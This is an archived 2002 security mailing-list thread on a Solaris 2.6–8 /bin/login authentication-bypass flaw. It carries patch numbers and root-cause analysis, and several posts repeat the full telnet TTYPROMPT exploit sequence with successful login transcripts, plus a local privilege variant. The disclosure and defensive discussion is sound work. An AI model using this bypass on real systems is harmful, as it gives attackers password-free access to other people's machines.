Re: Solaris 2.6, 7, 8
Hi. On Wed, Oct 02, 2002 at 12:00:38PM -0400, buzheng wrote: But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). Which is plain wrong. This may be true for the 64 times c method, but in the generic case it does not matter. The second bug in login, where login walks out of a 64 (char *) array can be exploited remotely to gain root privileges even if you cannot login as root legally and even if you do not touch TTYPROMPT at all. If you have applied patches for these 2 bugs, you are safe now. And everybody should have done so since November 2001. -- bu,zheng [EMAIL PROTECTED] ciao, Sebastian -- -. [EMAIL PROTECTED] -. + http://segfault.net/~scut/ `. -' segfault.net/~scut/pgp `' 5453 AC95 1E02 FDA7 50D2 A42D 427E 6DEF 745A 8E07 `- project grasp infiltrated, phantom works falling. hi echelon! '
RE: Solaris 2.6, 7, 8
This is nothing more than a newly disclosed way of exploiting an old bug, hardly newsworthy unless you're in the dot slash hacking business. In the spirit of giving credit where credit is due, I'd like to note that the bug was originally found by duke (ISS/ADM) of course. This method of exploitation, to the best of my knowledge, was first used by brian mcwilliams(bmcw@AOLIM). This is very similar too how I exploited it, but instead of using fflag to force auth, I used malloc. The problem is in the getargs function inside login, which is called in multiple places. A buffer is parsed into a static char pointer array of size 64. Whitespace is a seperator, and no bounds checking is done. Patch has been available for a long time, but you dont need it if you use ISS IDS, because you are automatically protected according to ISS's statement.. ISS RealSecure Network Sensor customers are currently protected from this vulnerability. Support for this issue was included in X-Press Update version 3.3 as the TelnetExcessiveTabs signature. This signature will be included in the next RealSecure Server Sensor. ISS Internet Scanner X-Press Update 6.1 for Internet Scanner version 6.2.1 included support for this issue with the TelnetTabBO check. ISS BlackICE customers are protected from this vulnerability by the 2000902 Telnet login name overflow signature. original findings by duke: http://xforce.iss.net/alerts/advise105.php my exploit: http://archives.neohapsis.com/archives/bugtraq/2002-03/0218.html
Re: Solaris 2.6, 7, 8
On Wed, 02 Oct 2002, you wrote: But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). I have heard several conflicting reports on this matter and there are at least two published exploits for the Solaris login overflow (by [EMAIL PROTECTED] and [EMAIL PROTECTED]) that do *not* explicitly set the TTYPROMPT environment variable. If somone (perhaps somone from Sun) could clarify this matter once and for all i would be most gratefull. -tb0b -- tb0b, Nietzschean. No Religion. No Flag. No Phear. http://bitterness.primitive-incision.co.uk/ `Who said anything about cutting you up man? I just wanted to carve a little `z' on your forehead.' -Dr Gonzo, Fear and Loathing in Las Vagas
Re: Solaris 2.6, 7, 8
Works like a champ on Solaris 2.6/Sparc: -- begin -- ~ $ telnet telnet environ define TTYPROMPT abcdef telnet o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.6 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: Thu Oct 3 14:49:33 from localhost Sun Microsystems Inc. SunOS 5.6 Generic August 1997 You have new mail. bin@ovcle$ uname -a SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4 bin@ovcle$ who am i binpts/6Oct 3 15:05(localhost) -- begin -- On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote: Sorry but I can't reproduce this on a Solaris 7 machine. sunlight.ccs% telnet telnet environ define TTYPROMPT abcdef telnet o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.7 login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword: Login incorrect As you can see I get a request for a username/password. Ramon Kagan York University, Computing and Network Services Unix Team - Intermediate System Administrator (416)736-2100 #20263 [EMAIL PROTECTED] - I have not failed. I have just found 10,000 ways that don't work. - Thomas Edison - On Wed, 2 Oct 2002, Jonathan S wrote: Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 cs, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet environ define TTYPROMPT abcdef telnet o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin Jonathan Stuart Network Security Engineer Computer Consulting Partners, Ltd. E-mail: [EMAIL PROTECTED] -- === Roy Kidder Data Network Engineer CoreComm --- ...these products' frequent failures are legitimized by ubiquitous acquiescence. -- Doc Searls on Microsoft products. ===
Re: Solaris 2.6, 7, 8
In-Reply-To: [EMAIL PROTECTED] This exploit can also be done local to gain higher priv's tester#TTYPROMPT=aa;export TTYPROMPT tester#exec login bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c/n tester:bin# Patches to resolve are: 2.6 105665-04 2.7 112300-01 2.8 111085-01
Re: Solaris 2.6, 7, 8
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote: Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 cs, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Looks like Solaris 9 is not vulnerable to this: [idubraws@elrond idubraws] 6 $ telnet telnet environ define TTYPROMPT abcdef telnet o 192.168.155.2 Trying 192.168.155.2... Connected to 192.168.155.2. Escape character is '^]'. SunOS 5.9 login: It automatically drops you to the login prompt. Perhaps this is fixed by a patch that got rolled into 9? Ido -- === |Ido Dubrawsky E-mail: [EMAIL PROTECTED] | | |Network Consulting Engineer :|::|: |VSEC Technical Marketing, SAFE Architecture :|||: :|||: |Cisco Systems, Inc. .:|||:..:|||:. |Austin, TX. 78759 === msg09296/pgp0.pgp Description: PGP signature
Re: Solaris 2.6, 7, 8
Sorry but I can't reproduce this on a Solaris 7 machine. sunlight.ccs% telnet telnet environ define TTYPROMPT abcdef telnet o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.7 login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword: Login incorrect As you can see I get a request for a username/password. Ramon Kagan York University, Computing and Network Services Unix Team - Intermediate System Administrator (416)736-2100 #20263 [EMAIL PROTECTED] - I have not failed. I have just found 10,000 ways that don't work. - Thomas Edison - On Wed, 2 Oct 2002, Jonathan S wrote: Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 cs, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet environ define TTYPROMPT abcdef telnet o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin Jonathan Stuart Network Security Engineer Computer Consulting Partners, Ltd. E-mail: [EMAIL PROTECTED]
Re: Solaris 2.6, 7, 8
On Wed, 2 Oct 2002, buzheng wrote: I do not think this is a new bug. I completely agree. But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). That's why this bug is not exploitable using remote applications like rlogin, ssh (at least if you are not crazy enough to enable UseLogin option) or X.25 pad: rlogin and pad aren't able to pass env vars others than TERM, while ssh normally don't uses /bin/login for user authentication. If you have applied patches for these 2 bugs, you are safe now. BTW: you can change multiple c s to a=bs, actually, since SYS V login treat as environ var separator, you can also use =64 words separated by or \t. they will all work. Agreed as well. :raptor Antifork Research, Inc. ITBH Italian Black Hats http://www.0xdeadbeef.eu.orghttp://elite.blackhats.it
Re: Solaris 2.6, 7, 8
Another thing, if you tcpwrap your telnet sessions, you can prevent localhost telnets. Ramon Kagan York University, Computing and Network Services Unix Team - Intermediate System Administrator (416)736-2100 #20263 [EMAIL PROTECTED] - I have not failed. I have just found 10,000 ways that don't work. - Thomas Edison - On Wed, 2 Oct 2002, Jonathan S wrote: Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 cs, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet environ define TTYPROMPT abcdef telnet o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin Jonathan Stuart Network Security Engineer Computer Consulting Partners, Ltd. E-mail: [EMAIL PROTECTED]
Re: Solaris 2.6, 7, 8
Apparently, Dave Ahmad wrote: % % These may be fixes for this vulnerablity, however they apply to telnetd % and this vulnerability has to be in login. So it makes more sense to apply the right patches to login, and not patches to telnetd. If you only want to install the necessary patches to plug this specific hole, very quickly, use these: solaris 8 login fix: 111085-02 solaris 7 login fix: 112300-01 solaris 2.6 login fix: 105665-04 solaris 2.5.1 login fix: 106160-02 use patchadd. A reboot is not necessary. During your normal maintenance window you should install the rest of the recommended patches. CHeers, Gert-Jan. -- + + --- ++ - +0+ + ++ +++ + + sed '/^[when][coders]/!d G.J.W. Hagenaars -- gj at hagenaars dot com /^...[discover].$/d Remembering Mike Carty 1968-1994 /^..[real].[code]$/!d UltrixIrixAIXHPUXSunOSLinuxBSD, nothing but nix ' /usr/dict/wordsI'm Dutch, what's _your_ excuse?
Solaris 2.6, 7, 8
Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 cs, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet environ define TTYPROMPT abcdef telnet o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin Jonathan Stuart Network Security Engineer Computer Consulting Partners, Ltd. E-mail: [EMAIL PROTECTED]
Re: Solaris 2.6, 7, 8
I have confirmed this on a fresh Solaris 8/sparc install. Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c Last login: Wed Oct 2 10:47:12 from localhost Sun Microsystems Inc. SunOS 5.8 Generic February 2000 $ id uid=2(bin) gid=2(bin) I suggest that everyone here who still uses telnet disable it immediately. These may be fixes for this vulnerablity, however they apply to telnetd and this vulnerability has to be in login. Solaris 8: 110668-03 Solaris 8x86: 110669-03 Solaris 7: 107475-04 Solaris 7x86: 107476-04 Solaris 2.6: 106049-04 Solaris 2.6x86: 106050-04 Solaris 2.5.1: 103640-40 Solaris 2.5.1x86: 103641-40 If these are band-aid fixes that simply cause telnetd to not pass TTYPROMPT to /bin/login, the setuid executable may still be exploitable locally. David Ahmad Symantec KeyID: 0x26005712 Fingerprint: 8D 9A B1 33 82 3D B3 D0 40 EB AB F0 1E 67 C6 1A 26 00 57 12 On Wed, 2 Oct 2002, Jonathan S wrote: Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 cs, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Re: Solaris 2.6, 7, 8
I do not think this is a new bug. Actually, the overflow is not at changing the ttyprompt remotely. in fact, if you just use a, instead of abcdef, as TTYPROMPT, it will still work. the overflow is that long user name with multiple space, all the c will be taken as environment. it is the very bug of SYS V derived login buffer overflow. bid:3681. But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). If you have applied patches for these 2 bugs, you are safe now. BTW: you can change multiple c s to a=bs, actually, since SYS V login treat as environ var separator, you can also use =64 words separated by or \t. they will all work. -- bu,zheng [EMAIL PROTECTED]
Re: Solaris 2.6, 7, 8
On Wed, 2 Oct 2002, Dave Ahmad wrote: I suggest that everyone here who still uses telnet disable it immediately. . . or install the latest Recomended patch cluster, which you should have done anyway. These may be fixes for this vulnerablity, however they apply to telnetd and this vulnerability has to be in login. There are patches for /bin/login as well On Solaris 8 it's 111085-02, dated Dec 13 2001: I haven't been able to reproduce this on a system with 111085-02 installed. == Chris Candreva -- [EMAIL PROTECTED] -- (914) 967-7816 WestNet Internet Services of Westchester http://www.westnet.com/
RE: Solaris 2.6, 7, 8
the problem is there exists an authentication flag called the fflag just after the array that gets overflowed in the .bss segment. this is an array of char pointers so when it is overflowed becuase of an mismanagement on the indexing of this array the fflag gets overwritten with an valid address on .bss segment. this is good enough to satify the if(fflag) condition and spawn a shell. some truth about this finding; There is an exploit out in the wild for sometime and the example pattern shown by Jonathan is exactly thesame with the payload of that exploit. so i'm curious about this findings origin, i think credits must be given due... i'll be waiting for a clerification form Mr. Stuart. thanks, sinan -Original Message- From: Jonathan S [mailto:[EMAIL PROTECTED]] Sent: Wednesday, October 02, 2002 9:13 AM To: [EMAIL PROTECTED] Subject: Solaris 2.6, 7, 8 Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 cs, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet environ define TTYPROMPT abcdef telnet o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin Jonathan Stuart Network Security Engineer Computer Consulting Partners, Ltd. E-mail: [EMAIL PROTECTED]
